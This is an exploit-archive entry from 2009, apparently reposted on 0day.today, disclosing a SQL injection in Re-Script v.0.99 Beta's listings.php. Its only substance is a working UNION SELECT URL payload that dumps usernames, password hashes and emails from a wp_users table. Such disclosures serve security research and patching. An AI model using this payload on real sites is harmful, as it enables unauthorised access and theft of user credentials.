id: 5709
date: 08/30/2009
title: Re-Script v.0.99 Beta ( listings.php op ) SQL Injection Vulnerability
author: Mr.SQL
cves: 

=====================================================================
Re-Script v.0.99 Beta ( listings.php op ) SQL Injection Vulnerability
=====================================================================


###############################################################
###############################################################
## Remote SQL Injection Vulnerability ( listings.php op )
##
## REScript V.0.99 Beta
##
## http://www.ebigman.com/
##
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/REScript/listings.php?op=details&id=-1+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a,user_login,user_pass,user_email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+wp_users--
##
########################
########################



#  0day.today [2023-03-24]  #